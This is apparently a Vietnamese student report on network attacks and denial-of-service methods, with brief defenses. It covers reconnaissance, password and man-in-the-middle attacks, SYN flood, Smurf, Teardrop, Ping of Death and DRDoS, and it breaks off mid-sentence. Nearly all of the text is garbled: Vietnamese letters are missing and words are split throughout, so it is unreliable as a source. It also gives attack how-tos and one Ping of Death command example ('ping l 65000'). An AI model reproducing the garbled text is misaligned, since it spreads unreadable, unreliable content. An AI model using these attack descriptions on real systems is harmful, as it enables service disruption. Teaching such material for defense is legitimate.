Professional Documents
Culture Documents
T
GAME OVER GROUP
LP : 09 UY UY P TM3
UY L VI T T VY T V T I T
TI
T
GAME OVER GROUP
LP : 09 UY UY P T 3
UY L VI T T VY T V T I T
L I
L I
L
T i:
Ph n I: I II III IV IV
V DDOS
ng ng Trang
i u i tv T n
Hiu bit v cc cuc tn cng mng Nhng nguy c nh hng n an ton mng. c c tn c ng mt mng m y t nh.. c c ch thc tn c ng . Mt s k thu t tn c ng mng Ph n II : i uT n ng ng os
II III
DoS attack l g ? 1. c mc ch ca tn c ng DoS. 2. Mc tiu Cc loi DoS attack hin ang c bit n v s dng Mt s phng ph p phng ch ng DOS. Ph n III : Kh i nim DDos (Distributed Denial Of Service) . c giai on ca cuc tn c ng DDos .. Kin trc tng quan ca DDos attack-network Phn Loi kiu tn c ng DDos Mt s c t nh ca c ng c DdoS attack Mt s c ng c DDoS.. Nhng k thu t ANTI- DDOS.
I II III IV V VI VII
Ph n 4
ng
nm ts
ht n
ng os v
os
Ph n I:
I: i u i t v cc u
i u i tv T n
ng
ng
t n cng m ng
Mt cuc tn cng mng c th c nh ngha l bt k phng php, quy trnh, phng tin c s dng c hi c gng tha hip an ninh mng. C mt s l do m mt c nhn (s) mu n tn cng mng doanh nghip. c c nhn thc hin cc cuc tn cng mng thng c gi l k tn cng mng, tin tc, hoc bnh quy gin. Mt vi loi khc nhau ca hot ng c hi m k tn cng mng v tin tc thc hin c tm tt y: S dng tri php ti khon ngi dng v c quyn n cp phn cng Phn mm nh cp hy m cho cc h th ng thit hi hy m thit hi v d liu tham nhng Sa i d liu c lu tr n cp d liu S dng d liu cho li ch ti chnh hoc hot ng gin ip cng nghip Thc hin cc hnh ng ngn chn ngi dng hp php c thm quyn truy c p vo cc dch v mng v cc ngun lc. Thc hin hnh ng lm cn kit ti nguyn mng v bng thng. II: hng nguy nh hng n an to n m ng 1. "Tay trong" Trong mt s doanh nghip va v nh, nhng d liu kinh doanh quan trng hay th ng tin kh ch hng thng c giao ph cho mt c nhn. iu ny to nn tnh trng "l thuc quyn hn" nguy him. Ton b bn ghi (log) h th ng mng, nhng b o c o t ng s kh ng c kim tra thng xuyn t ban qun tr. Vic tht tho t d liu c th din ra trong khong thi gian di m kh ng b ph t hin. 2. Kh ng c k hoch x l ri ro H th ng m y t nh, mng ca doanh nghip lu n phi i mt v i nhiu nguy c bo m t, t vic h hng v t l cho n c c trng hp b tn c ng t tin tc hay virus u c kh nng gy tn hi cho d liu. Kh nhiu doanh nghip va v nh thiu hn ch nh s ch phn ng v i vic tht tho t d liu hay k hoch khc phc s c . i a s u lng tng v bt u c c hot ng mang t nh ng ph. 3. Nhng thit l p mc nh kh ng c thay i Tin tc hin nay thng dng c c t p tin cha ng hng trm ngn ti khon mc nh (username v password) ca c c thit b kt n i mng d tm quyn hn 6
truy xut kh nng ng nh p vo h th ng mng. Nu c c ti khon, thit l p mc nh kh ng c thay i, tin tc s d dng chim quyn iu khin ti nguyn mng. 4. M i trng mng ti gia kh ng an ton i v i mt vi doanh nghip nh, c c nhn vin thng em m y t nh x ch tay (laptop) ca mnh n vn phng lm vic. Trong m i trng mng ti gia nh, ch bo m t thng rt km hay th m ch kh ng c nhng thit l p bo v. Do , nhng chic laptop ca nhn vin c th l ngun g c ph t t n virus, malware hay tr thnh zombie trung gian tin tc tn c ng vo h th ng mng ca doanh nghip. 5. Thiu cnh gi c v i mng c ng cng Mt th on chung tin tc hay s dng dn d nhng nn nhn l t mt thit b trung chuyn wireless access-point kh ng ci t m t khu (unsecured) ri g n mt c i nhn nh "Mng Wi-Fi min ph " v rung i ngi ch nhng kt n i "ngy th" ri vo by. Tin tc s dng c c c ng c thu tm gi d liu mng gip nh n bit c nhng vn bn hay bt k nhng g m nhn vin doanh nghip g ri gi ra ngoi. 6. Mt m t thit b di ng Rt nhiu doanh nghip, th m ch gn y cn c c mt vi hng l n b tht tho t d liu quan trng do mt cp m y t nh x ch tay, tht lc in thoi di ng hay c c a flash US lu tr. D liu trong c c thit b ny thng t c m ha hay bo v bng m t khu, rt d dng x l mt khi s hu chng. 7. Li t m y ch web Hin cn kh nhiu doanh nghip kh ng coi trng vic t website ca mnh ti m y ch no, mc bo m t ra sao. Do , website kinh doanh ca doanh nghip s l mi ngon ca c c t tn c ng SQL Injection hay botnet. 8. Duyt web trn lan Kh ng phi nhn vin vn phng no cng am hiu tng t n v nhng him ha rnh r p trn mng Internet nh malware, spyware, virus, trojan... H c v t truy c p vo c c website kh ng x c nh hoc b dn d click vo nhng website c tin tc by c cho n v th l m y t nh ca nhn vin s l c nh ca gip tin tc xm nh p vo trong mng ca doanh nghip. 9. Email cha ng m c Nhng cuc gii bom th r c s lm trn ng p hp th ca bn v i nhng tiu hp dn nh nhng v scandal tnh i, hnh nh nng bng hay c c li mi cho 7
kinh doanh... ch mt c nhp chut sai lm th ngay l p tc m y t nh s ti v c c on m c lm tin cho hng lot phn mm c hi i sau xm nh p vo m y tnh. 10. Kh ng v li bo m t Hn 90% c c cuc tn c ng vo h th ng mng u c gng khai th c c c li bo m t c bit n. Mc d c c bn v li vn thng xuyn c nhng hng sn xut cung cp ngay sau khi li c ph t hin nhng mt vi doanh nghip li kh ng coi trng vic c p nh t li thng nh t dn n vic c c li bo m t m toang cng cho n nhng cuc tn c ng. 11.Mt s nguy c kh c + L hng Zero-day i v i c c phn mm ca Adobe (Flash Player, Adobe Reader v Acrobat). y l l hng m i ph t hin trong th ng 3/2011 v c nh gi l li nghim trng. N cho php k tn c ng thc thi c c m lnh v c th chim quyn iu khin h th ng. Ti phm mng nh km m c d i hnh thc t p tin Flash (.swf) vo c c ti liu c nh dng pdf hoc Excel. + Su onficker xut hin t kh s m ti Vit Nam v lin tc c nhiu bin th kh c nhau; ngy cng tr nn nguy him. c t nh, c n hng triu m y t nh trn th gi i ang nhim su onficker v v tnh tr thnh mng m y t nh botnet gip cho c c hacker t chc c c t tn c ng DDoS quy m l n. + Hin ti, ang xut hin loi malware (m c) khi ly nhim vo m y t nh s chim quyn iu khin h th ng v a ra c c th ng b o gi mo. Malware ny tn c ng vo c c m y t nh s dng Windows kh ng c bn quyn v a ra ngh k ch hot dch v. Nhiu ngi tiu dng mt tin oan khi gi in thoi lin lc v i tng i (do hacker ch nh) ly m s k ch hot Windows. 12. Nhng im yu trong vn bo m t: Hiu c nhng im yu trong bo m t l mt vn ht sc quan trng tin hnh nhng ch nh s ch bo m t c hiu qu. Hiu nhng im yu ny gip bo m t mng tr c khi bi hacker tn c ng. isco x c nh nhng im yu trong bo m t gm c: technology weaknesses, configuration weaknesses v policy weaknesses. 12.1) Technology weaknesses: im yu trong k thu t gm c im yu trong protocol, operating system v hardware. a) TCP/IP weaknesses: Giao thc T P/IP l im yu trong bo m t v n c thit k nh mt tiu chun m gip cho vic trao i th ng tin c d dng. iu lm cho n tr
nn s dng rng ri nhng cng lm cho n d dng b tn c ng v hu ht mi ngi u thn thuc v i c ch thc T P/IP lm vic. Hai giao thc m isco th ch la chn trong chm giao thc T P/IP nhng v n c hu li kh ng c bo m t la SMTP ( T P ) va SNMP ( UDP ). in hnh ca k thu t tn c ng vo hai giao thc ny l IP spoofing, man-in-the-middle v session replay. b) Operating System weaknesses: Trong khi tt c c c h iu hnh u c im yu th Linux v Unix c xem nh l t c im yu hn Windows. Thc t, hu ht mi ngi dng c c phin bn ca Windows. c) Network equipment weaknesses: Hu ht c c thit b mng nh l servers, switchs, routers u c iu yu trong bo m t. Nhng c mt ch nh s ch t t cho vic cu hnh v lp t cho c c thit b mng s lm gim i rt nhiu s nh hnng ca im yu ny. 12.2) Configuration weaknesses: y l li do nh qun tr to ra. Li ny do c c thiu st trong vic cu hnh nh l: kh ng bo m t ti khon kh ch hng, h th ng ti khon v i password d dng o n bit, kh ng bo m t c c cu hnh mc nh trn thit b hay li trong vic cu hnh thit b. a) Unsecured user account: Mi user account cn c usename v password cho mc ch bo m t. c username v password ny thng c truyn i dng clear text trn mng. Do , cn c ch nh s ch bo m t user account nh m ho , authentication b) System account with easily guessed password: Mt im yu trong li cu hnh kh c l bo m t account v i password d dng b nh cp. ngn chn tnh trng , ngi qun tr cn c ch nh s ch kh ng cho php mt password c hiu lc mi mi m password ny phi c mt thi hn kt thc. c) Misconfigured Internet services: Mt vi c ng ty s dng a ch th t trn mng internet nh a ch cho hosts v servers. iu ny to nn im yu m c c hacker s d dng khai th c th ng tin. S dng giao thc NAT hoc PAT c th gii quyt vn trn. S dng a ch ring ( private address ) cho php nh a ch hosts v servers ma kh ng cn dng a ch th t trn mng, trong khi a ch th t th c border router nh tuyn ra mng internet.
kh ng phi l bin ph p t i u. Port trn interface kt n i ra internet phi trng th i open cho php users vo mng internet v ngc li. l l hng trn bc tng la ( firewall ) m hacker c th tn c ng vo. n c th to ra t nh bo m t cho network bng c ch s dng conduits , l kt n i bo m t c bn. isco Secure Private Internet Echange ( PIX ) firewall l bin ph p t i u to ra t nh bo m t t t cho mng. d) Unsecured default settings in product: Nhiu sn phm phn cng c cung cp m kh ng c password hoc l password sn c gip cho nh qun tr d dng cu hnh thit b. N lm cho c ng vic d dng hn, nh mt s thit b ch cn cm vo v hot ng. iu ny s gip cho s tn c ng mng tr nn d dng. Do , ta cn phi thit l p mt ch nh s ch cu hnh bo m t trn mi thit b tr c khi thit b c lp t vo h th ng mng. e) Misconfigured Netword Equipment: Li cu hnh thit b l mt l hng c th khai th c tn c ng mng: password yu, kh ng c ch nh s ch bo m t hoc kh ng bo m t user account u l li cu hnh thit b. Phn cng v nhng giao thc chy trn thit b cng to ra l hng bo m t trong mng. Nu bn kh ng c ch nh s ch bo m t cho phn cng v nhng giao thc ny th hacker s li dng tn c ng mng. Nu bn s dng SNMP c mc nh thit l p th th ng tin c th b nh cp mt c ch d dng v nhanh chng. Do , hy chc chn l bn lm mt hiu lc ca SNMP hoc l thay i mc nh thit l p SNMP c sn. 12.3) Policy weaknesses: h nh s ch bo m t din t lm th no v u ch nh s ch bo m t c thc hin. y l iu kin quan trng gip vic bo m t c hiu qu t t nht. im yu trong ch nh s ch bao gm: Absence of a written security policy, organization politics, lack of business continuity, lax security administrator, installation and changes that do not follow the stated policy v no disaster recovery plan.
10
III:
t n
ng m t m ng m y t nh
1. Thu t p th ng tin v h th ng Thu t p th ng tin h th ng c th phn ra lm hai loi + Th ng (Passive Reconnaissance): theo seamoun th c th gi bng mt c i tn mc mt l "ci nga xem hoa h th ng". Vic thu t p th ng tin loi ny l kho s t s b t chc nh l th ng tin chung, v tr a l, in thoi, email ca c c c nhn, ngi iu hnh, ... trong t chc. c bn hi ti sao phi thu t p nhng th ng tin nh in thoi, email ca nhng ngi trong t chc ny lm c i qu i g ? N s rt hu ch khi thc hin social engineering attack (seamoun s c p sau ny). + h ng (Active Reconnaissance) loi ny th thu t p trc tip nhng th ng tin s t v i h th ng hn nh l (dy) a ch IP, domain, DNS. Lu : Tt c vic thu t p th ng tin ny rt quan trng i v i hacker v gip hacker x c nh nhng con ng no m d tn c ng vo h th ng nht. Gi ng nh i t n g i v y, t n trc tip "em g i" th ch c b u . Phi kho s t nh em u, c bao nhiu anh em, cha m nh th no, tm hiu s th ch em n qua nhng ngi bn thn ca em g i ... (Ni sai ch , ch ny cho my T ng min Nam v c ni chc siu hn seamoun ). Qu trnh thu t p th ng tin c th m t thnh 7 b c. (PHn loi ch mang t nh cht tng i). 1: Thu t p th ng tin ban u 2: X c nh phm vi ca mng. 3: Kim tra m y c "s ng" kh ng ? 4: Kh m ph nhng cng m . 5: Nh n din h iu hnh. 6: Lit k nhng dch v da trn c c cng m kim tra. 7: Xy dng mt s mng 2. Scanning Scanning hay cn gi l qut mng l b c kh ng th thiu c trong qu trnh tn c ng vo h th ng mng ca hacker. Nu lm b c ny t t Hacker s mau chng ph t hin c li ca h th ng v d nh li RP ca Window hay li trn phm mm dch v web nh Apache v.v. V t nhng li ny, hacker c th s dng nhng on m c hi(t c c trang web) tn c ng vo h th ng, ti t nht ly shell. Phn mm scanning c rt nhiu loi, gm c c phm mm thng mi nh Retina, GFI, vc c phn mm min ph nh Nmap,Nessus. Th ng thng c c n bn thng mi c th update c c bug li m i t internet v c th d tm c nhng li m i hn. c phn mm scanning c th gip ngi qun tr tm c li ca h th ng, ng thi a ra c c gii ph p sa li nh update Service patch hay s dng c c policy hp l hn.
11
IV.
h th t n
ng
. Ph ho i m ng.
a trn t nh gi i h n ho kh ng th ph hi a t i nguyn
1) Th ng qua k t n i: 1.1: Tn c ng kiu SYN flood: Li dng c c thc hot ng ca kt n i T P/IP, hacker bt u qu trnh thit l p mt kt n i TP /IP v i mc tiu mu n tn c ng nhng s ph v kt n i ngay sau khi qu trnh SYN v SYN A K hon tt, khin cho mc tiu ri vo trng th i ch (i gi tin A K t ph a yu cu thit l p kt n i) v lin tc gi gi tin SYN A K thit l p kt n i . Mt c ch kh c l gi mo a ch IP ngun ca gi tin yu cu thit l p kt n i SYN v cng nh trng hp trn, m y t nh ch cng ri vo trng th i ch v c c gi tin SYN A K kh ng th i ch do a ch IP ngun l kh ng c th t. ch thc ny c th c c c hacker p dng tn c ng mt h th ng mng c bng th ng l n hn h th ng ca hacker. 2) Li ng ngun t i nguyn a h nh n n nhn t n ng:
2.1: Tn c ng kiu Land Attack Cng tng t nh SYN flood nhng hacker s dng ch nh IP ca mc tiu cn tn c ng dng lm a ch IP ngun trong gi tin, y mc tiu vo mt vng lp v t n khi c gng thit l p kt n i v i ch nh n. 2.2: T n ng ki u UDP flood Hacker gi gi tin UDP echo v i a ch IP ngun l cng loopback ca ch nh mc tiu cn tn c ng hoc ca mt m y t nh trong cng mng v i mc tiu qua cng UDP echo (port 7) thit l p vic gi v nh n c c gi tin echo trn 2 m y t nh (hoc gia mc tiu v i ch nh n nu mc tiu c cu hnh cng loopback) khin cho 2 m y t nh ny dn dn s dng ht bng th ng ca chng v cn tr hot ng chia s ti nguyn mng ca c c m y t nh kh c trong mng. 3) ng ng th ng: 3.1: Tn c ng kiu DDoS (Distributed Denial of Service) y l c ch thc tn c ng rt nguy him. Hacker xm nh p vo c c h th ng m y t nh, ci t c c chng trnh iu kin t xa v s k ch hot ng thi c c chng trnh ny vo cng mt thi im ng lot tn c ng vo mt mc tiu. ch thc ny c th huy ng t i hng trm th m ch hng ngn m y t nh cng tham gia tn c ng mt lc (ty vo s chun b tr c ca hacher) v c th ng n ht bng th ng ca mc tiu trong nh y mt.
12
4) ng
K tn c ng li dng c c ngun ti nguyn m nn nhn cn n tn c ng. Nhng k tn c ng c th thay i d liu v t sao chp d liu m nn nhn cn ln nhiu ln lm PU b qu ti v c c qu trnh x l d liu b nh tr. 4.1: T n ng ki u murf tta k Kiu tn c ng ny cn mt h th ng rt quan trng, l mng khuych i. Hacker dng a ch ca m y t nh cn tn c ng gi broadcast gi tin I MP echo cho ton b mng. c m y t nh trong mng s ng lot gi gi tin I MP reply cho my t nh m hacker mu n tn c ng. Kt qu l m y t nh ny s kh ng th x l kp thi mt lng l n th ng tin nh v y v rt d b treo. 4.2: T n ng ki u Tear rop Trong mng chuyn mch gi, d liu c chia nh lm nhiu gi tin, m i gi tin c mt gi tr offset ring v c th truyn i theo nhiu ng t i ch. Ti ch, nh vo gi tr offset ca tng gi tin m d liu li c kt hp li nh ban u. Li dng iu ny, hacker c th to ra nhiu gi tin c gi tr offset trng lp nhau gi n mc tiu mu n tn c ng. Kt qu l m y t nh ch kh ng th sp xp c nhng gi tin ny v c th b treo do dng ht nng lc x l ca h th ng. .Ph ho i ho hnh sa th ng tin u hnh.
Li dng vic cu hnh thiu an ton (v d nh vic kh ng x c thc th ng tin trong vic gi v nh n bn tin update ca c c router) m k tn c ng s thay i t xa hoc trc tip c c th ng tin quan trng khin cho nhng ngi dng hp ph p kh ng th s dng dch v. V d: hacker c th xm nh p vo DNS thay i th ng tin, dn n qu trnh bin dch domain name sang IP ca DNS b sai lch. Kt qu l c c yu cu ca client n mt domain no s bin thnh mt domain kh c. .Ph ho i ho hnh sa vt l ph n ng.
Li dng quyn hn ca ch nh bn thn k tn c ng i v i c c thit b trong h th ng mng tip c n ph hoi (c c router, switch) t s k thut t n ng m ng
IV:
1) Reconnaissance attacks: c u hacker ping n tm nhm x c nh a ch IP ch. Sau , hacker x c nh nhng port cng nh nhng dch v ang s ng trn a ch IP . T nhng th ng tin ny, hacker bt u x c nh c dng v phin bn ca h iu hnh. Hacker tin hnh nh cp d liu hoc ph hu h iu hnh ca mng. c hnh thc tn c ng dng ny bao gm: packet sniffers, port scans, ping sweeps, internet information queries. 13
a) Packet sniffers L phn mm ng dng dng mt card adapter v i promiseous mode bt gi tt c c c gi tin gi xuyn qua mt mng LAN. K thu t ny ch thc hin c trn cng mt collision domain. Packet sniffers s khai th c nhng th ng tin c truyn dng clear text. Nhng giao thc truyn dng clear text bao gm: Telnet, FTP, SNMP, POP, HTTP i v packet c truyn i kh ng c m ho nh trn, n c th b x l bi bt k ai s dng k thu t packet sniffers. hng ng sau ng ngn n pa ket sniffers gm: authentication, switched infrastrutured, antisniffer va cryptography.
Authentication K thu t x c thc ny c thc hin ph bin nh one-type password (OTPs). K thu t ny c thc hin bao gm hai yu t : personal identification number ( PIN ) v token card x c thc mt thit b hoc mt phn mm ng dng. Token card l thit b phn cng hoc phn mm sn sinh ra thng tin mt c ch ngu nhin ( password ) tai mt thi im, thng l 60 giy. Kh ch hng s kt n i password v i mt PIN to ra mt password duy nht. Gi s mt hacker hc c password bng k thu t packet sniffers, th ng tin cng kh ng c gi tr v n ht hn. Switched infrastructured K thu t ny c th dng ngn chn packet sniffers trong m i trng mng. Vd: nu ton b h th ng s dng switch ethernet, hacker ch c th xm nh p vo lung traffic ang lu th ng ti 1 host m hacker kt n i n. K thu t ny kh ng lm ngn chn hon ton packet sniffer nhng n c th gim c tm nh hng ca n. Antisniffer tools L nhng phn mm v phn cng c thit k ngn chn sniffer. Th t s nhng ng dng ny kh ng ngn chn c hon ton nguy c b sniffer nhng cng gi ng nh nhng c ng c kh c, n l mt phn ca ton b h th ng. Cryptography K thu t m ho ny gip cho d liu c truyn i qua mng ma kh ng dng clear text. Gi s hacker c bt c d liu th cng kh ng th gii m c th ng tin. Phng ph p ny c hiu lc hn so v i vic d tm v ngn cn 14
sniffer. Nu nh mt knh truyn c m ho , d liu m packet sniffer d tm c cng kh ng c gi tr v kh ng phi l th ng tin ch nh x c ban u. H th ng m ha ca isco da trn k thu t IPSec, giao thc m ha ng hm da trn a ch IP. Nhng giao thc gm: Secure Sell Protocol ( SSH ) v Secure Socket Layer ( SSL ). b) Port scans va ping sweeps K thu t ny c tin hnh nhm nhng mc ch nh sau: X c nh nhng dch v trong mng X c nh c c host v thit b ang v n hnh trong mng X c nh h iu hnh trong h th ng X c nh tt c c c im yu trong mng, t tin hnh nhng mc ch kh c. V i k thu t ping sweeps, hacker c th x c nh mt danh s ch c c host ang s ng trong mt m i trng. T , hacker s dng c ng c port scans xoay vng qua tt c c c port v cung cp mt danh s ch y c c dch v ang chy trn host tm thy bi ping sweeps. ng vic tip theo l hacker x c nh nhng dch v c im yu v bt u tn c ng vo im yu ny. K thu t IDS c dng cnh b o cho nh qun tr khi c reconnaissance attacks nh l port scans va ping sweeps. IDS gip nh qun tr c s chun b t t nhm ngn cn hacker. c) Internet information queries DNS queries c th ch ra nhiu th ng tin nh l ngi s hu mt domain no v range a ch no c n nh cho domain . Hacker s dng c ng c ny trinh s t tm ra cc thng tin trn mng. ng v i port scans v ping sweeps, sau khi tm ra c nhng th ng tin y nh c c port active, c c giao thc chy trn port , hacker tin hnh kim tra nhng c trng ca c c ng dng ny tm ra im yu v bt u tn c ng. 2) Access attacks Trong phng ph p ny, k xm nh p in hnh tn c ng vo mng nhm: nh cp d liu, ginh ly quyn access, v ginh ly nhng c quyn access sau ny. Access attacks c th bao gm: Password attack Trust exploitation Port redirection Man in the middle attack 15
a) Password attack Hacker c th xm nh p h th ng dng c c k attacks, trojan horce, IP spoofing v packet sniffer.
thu t brute-force
Thng mt cuc tn c ng brute-force attack c thc hin dng 1 chu trnh chy xuyn qua mng v c gng xen vo chia s m i trng. Khi hacker ginh c quyn access n mt ngun ti nguyn, hacker cng v i user cng chia s quyn li. Nu nh c ti nguyn th hacker s to ra mt ca s k n cho ln access sau. Hacker c th lm thay i bng nh tuyn trong mng. iu s lm chc chn rng tt c c c gi tin s c gi n hacker tr c khi c gi n ch cu i cng. Trong mt vi trng hp, hacker c th gi m s t tt c c c traffic, th t s tr thnh mt man in the middle. Ta c th hn ch password attack bng nhng c ch sau Kh ng cho php user dng cng password trn c c h th ng. Lm mt hiu lc account sau mt vi ln login kh ng thnh c ng. c kim tra ny gip ngn chn vic r so t password nhiu ln. Kh ng dng passwords dng clear text: dng k thu t OTP hoc m ho password nh trnh by phn trn. Dng strong passwords: Dng password ny dng t nht 8 k t, cha c c uppercase letters, lowercase letters, nhng con s v nhng k t c bit. b) Trust exploitation y l phng ph p khai th c tin c y , n da vo c c m i quan h tin c y bn trong mng. nh thng, nu hai domain c m i quan h tin c y v i nhau th cho php thit b domain ny c th access vo domain kia. Hacker s li dng s h trong m i quan h tin c y nhm khai th c c c sai st trong m i quan h ny tho hip, tc l kim so t. H th ng bn ngoi firewall s c m i quan h hon ton kh ng tin c y v i h th ng bn trong firewall. c) Port redirection L mt dng kh c ca trust exploitation attack m n s dng mt host tho hip nhm ly giy php ra vo firewall. Ta c th tng nh l mt firewall v i 3 interface v mi interface kt n i v i 1 host. Host bn ngoi c th h ng n host public services ( thng c gi l demilitanized zone- DMZ ). V host public services c 16
th h ng t i c host bn trong hay bn ngoi firewall.Hacker lm cho host public service tr thnh 1 host tho hip. Hacker t mt phn mm ti host ny nhm to ra mt traffic trc tip t host outside n host inside. Kt n i ny s ko thc hin th ng qua firewall. Nh v y, host bn ngoi ginh c quyn kt n i v i host bn trong th ng qua qui trnh port redirection ti host trung tm ( public services host ). d) Man in the middle attack K thu t man in the middle c thc hn bao gm: Netword packet sniffers Giao thc routing v transport. Tn c ng man in the middle nhm mc ch: nh cp d liu Ginh ly mt phin giao dch Phn t ch traffic trong mng DoS Ph hng d liu c truyn Mt v d ca man in the middle attack l: mt ngi lm vic cho ISP v c gng access n tt c c c gi d liu v n chuyn gia ISP v bt k mt mng no kh c. Ta c th ngn chn hnh thc tn c ng ny bng k thu t m ho : m ho traffic trong mt ng hm IPSec, hacker s ch nhn thy nhng th ng tin khng c gi tr.
17
Ph n II :
I ) DoS attack l g ?
i uT n
ng
ng os
( Denial Of Services Attack ) _ DoS attack ( dch l tn cng t ch i dch v ) l kiu tn cng rt li hi , v i loi tn cng ny , bn ch cn mt my tnh kt n i Internet l c th thc hin vic tn cng c my tnh ca i phng . thc cht ca DoS attack l hacker s chim dng mt lng l n ti nguyn trn server ( ti nguyn c th l bng thng, b nh , cpu, a cng, ... ) lmcho server khng th no p ng cc yu cu t cc my ca ngui khc ( m yca nhng ngi dng bnh thng ) v server c th nhanh chng b ngng hot ng, crash hoc reboot 1 m h a t n ng o
gng chim bng th ng mng v lm h th ng mng b ng p (flood), khi h th ng mng s kh ng c kh nng p ng nhng dch v kh c cho ngi dng bnh thng. gng lm ngt kt n i gia hai m y, v ngn chn qu trnh truy c p vo dch v. gng ngn chn nhng ngi dng c th vo mt dch v no gng ngn chn c c dch v kh ng cho ngi kh c c kh nng truy c p vo. Khi tn c ng DoS xy ra ngi dng c cm gi c khi truy c p vo dch v nh b: + Disable Network - Tt mng + Disable Organization - T chc kh ng hot ng + Financial Loss Ti ch nh b mt 2. tiu m k t n ng thng s ng t n ng o
Nh chng ta bit bn trn tn c ng DoS xy ra khi k tn c ng s dng ht ti nguyn ca h th ng v h th ng kh ng th p ng cho ngi dng bnh thng c v y c c ti nguyn chng thng s dng tn c ng l g: To ra s khan him, nhng gi i hn v kh ng i m i ti nguyn ng th ng ca h th ng mng (Network andwidth), b nh , a, v PU Time hay cu trc d liu u l mc tiu ca tn c ng DoS. Tn c ng vo h th ng kh c phc v cho mng m y t nh nh: h th ng iu ho, h th ng in, ht h ng lm m t v nhiu ti nguyn kh c ca doanh nghip. n th tng tng khi ngun in vo m y ch web b ngt th ngi dng c th truy c p vo m y ch kh ng. Ph hoi hoc thay i c c th ng tin cu hnh.
18
Ph hoi tng v t l hoc c c thit b mng nh ngun in, iu ho II ) Cc lo i DoS attack hin ang i t n v s ng :
1 . ) Winnuke DoS attack loi ny ch c th p dng cho cc my tnh ang chy Windows9x .Hacker s gi cc gi tin v i d liu "Out of Band" n cng 139 ca my t nh ch.( ng 139 chnh l cng NetBIOS, cng ny ch chp nh n cc gi tin cc Out of Band c b t ) . Khi my tnh ca victim nh n c gi tin ny,mt mn hnh xanh bo li s c hin th ln v i nn nhn do chngtrnh ca Windows nh n c cc gi tin ny nhng n li khng bit phn ngv i cc d liu Out Of Band nh th no dn n h th ng s b crash . 2 . ) Ping of Death kiu DoS attack ny , ta ch cn gi mt gi d liu c kch th c l n thng qua lnh ping n my ch th h th ng ca h s b treo . _ VD : ping l 65000 3 . ) Teardrop Nh ta bit , tt c cc d liu chuyn i trn mng t h th ngngun n h th ng ch u phi tri qua 2 qu trnh : d liu sc chia ra thnh cc mnh nh h th ng ngun, mi mnh u phi cmt gi tr offset nht nh xc nh v tr ca mnh trong gid liu c chuyn i. Khi cc mnh ny n h th ng ch, h th ng ch s da vo gi tr offset sp xp cc mnh li v i nhau theo tht ng nh ban u . Li dng s h , ta ch cn gi n h th ng ch mt lot gi packets v i gi tr offset chng cho ln nhau. H th ng ch s khng th no sp xp li cc packets ny, n khng iu khinc v c th b crash, reboot hoc ngng hot ng nu s lng gi packets v i gi tr offset chng cho ln nhau qu l n! 4 . ) SYN Attack Trong SYN Attack, hacker s gi n h th ng ch mt lot SYN packets v i a ch ip ngun khng c thc. H th ng ch khi nh n c cc SYN packets ny s gi tr li cc a ch khng c thc v ch i nh n thng tin phn hi t cc a ch ip gi . V y l cc a ch ip khng c thc, nn h th ng ch s s ch i v ch v cn a cc "request"ch i ny vo b nh , gy lng ph mt lng ng k b nh trn my ch m ng ra l phi dng vo vic khc thay cho phi ch i thng tin phn hi khng c thc ny . Nu ta gi cng mt lc nhiu gi tin c ach IP gi nh v y th h th ng s b qu ti dn n b crash hoc boot my tnh . == > nm du tay . 5 . ) Land Attack Land Attack cng gn gi ng nh SYN Attack, nhng thay v dng cc a ch ipkhng c thc, hacker s dng chnh a ch ip ca h th ng nn nhn. iuny s to nn mt vng lp v t n gia trong chnh h th ng nn nhn ,gia mt bn cn nh n thng tin phn hi cn mt bn th chng bao gi gith ng tin phn hi i c . == > G y ng p lng ng . 6 . ) Smurf Attack Trong Smurf Attack, cn c ba thnh phn: hacker (ngi ra lnh tn cng), mngkhuch i (s nghe lnh ca hacker) v h th ng ca nn nhn. Hacker sgi cc gi tin ICMP n a ch broadcast ca mng khuch i. iu c bit l cc gi 19
tin ICMP packets ny c a ch ip ngun chnh l a ch ipca nn nhn . Khi cc packets n c a ch broadcast ca mngkhuch i, cc my tnh trong mng khuch i s tng rng my tnh nnnhn gi gi tin ICMP packets n v chng s ng lot gi tr li hth ng nn nhn cc gi tin phn hi ICMP packets. H th ng my nn nhn skh ng chu ni mt kh i lng khng l cc gi tin ny v nhanh chng bngng hot ng, crash hoc reboot. Nh v y, ch cn gi mt lng nh cc gi tin ICMP packets i th h th ng mng khuch i s khuch ilng gi tin ICMP packets ny ln gp bi . T l khuch i ph thuc vos mng tnh c trong mng khuch I . Nhim v ca cc hacker l c chim c cng nhiu h th ng mng hoc routers cho php chuyn trc tipc c gi tin n a ch broadcast khng qua ch lc a ch ngun c cu ra ca gi tin . C c cc h th ng ny, hacker s d dng tin hnh Smurf Attack trn cc h th ng cn tn cng . == > mt my lm chng si nh ,chc my chm li ta nh cho thua . 7 . ) UDP Flooding Cch tn cng UDP i hi phi c 2 h th ng my cng tham gia. Hackers slm cho h th ng ca mnh i vo mt vng lp trao i cc d liu qua giaothc UDP. V gi mo a ch ip ca cc gi tin l a ch loopback (127.0.0.1 ) , ri gi gi tin ny n h th ng ca nn nhn trn cng UDP echo( 7 ). H th ng ca nn nhn s tr li li cc messages do 127.0.0.1( chnh n) gi n , kt qu l n s i vng mt vng lp v t n. Tuy nhin, cnhiu h th ng khng cho dng a ch loopback nn hacker s gi mo mta ch ip ca mt my tnh no trn mng nn nhn v tin hnh ng plt UDP trn h th ng ca nn nhn . Nu bn lm cch ny khng thnh cngth chnh my ca bn s b y . 8 . ) Tn cng DNS Hacker c th i mt l i vo trn Domain Name Server ca h th ng nn nhnri cho ch n mt website no ca hacker. Khi my khch yu cu DNS phntch a ch b xm nh p thnh a ch ip, l p tc DNS ( b hacker thayi cache tm thI ) s i thnh a ch ip m hacker cho ch n . Kt qu l thay v phi vo trang Web mu n vo th cc nn nhn s votrang Web do chnh hacker to ra . Mt cch tn cng t ch i dch v th t huhiu !. 9 . ) Distributed DoS Attacks ( DDos ) DDoS yu cu phi c t nht vi hackers cng tham gia. u tin cc hackers sc thm nh p vo cc mng my tnh c bo m t km, sau ci ln c ch th ng ny chng trnh DDoS server. By gi cc hackers s hn nhau nthi gian nh s dng DDoS client kt n i n cc DDoS servers, sau ng lot ra lnh cho cc DDoS servers ny tin hnh tn cng DDoS n hth ng nn nhn . 10 . ) DRDoS ( The Distributed Reflection Denial of Service Attack ) y c l l kiu tn cng li hi nht v lm boot my tnh ca i phng nhanh gn nht . Cch lm th cng tng t nh DDos nhng thay v tn cng bng nhiu my tnh th ngi tn cng ch cn dng mt my tn cng thng qua cc server l n trn th gi i . Vn v i phng php gi mo a ch IP ca victim , k tn cng s gi cc gi tin n cc server mnh nht, nhanh nht v c ng truyn rng nht nh Yahoo .v.v , cc server ny s phn 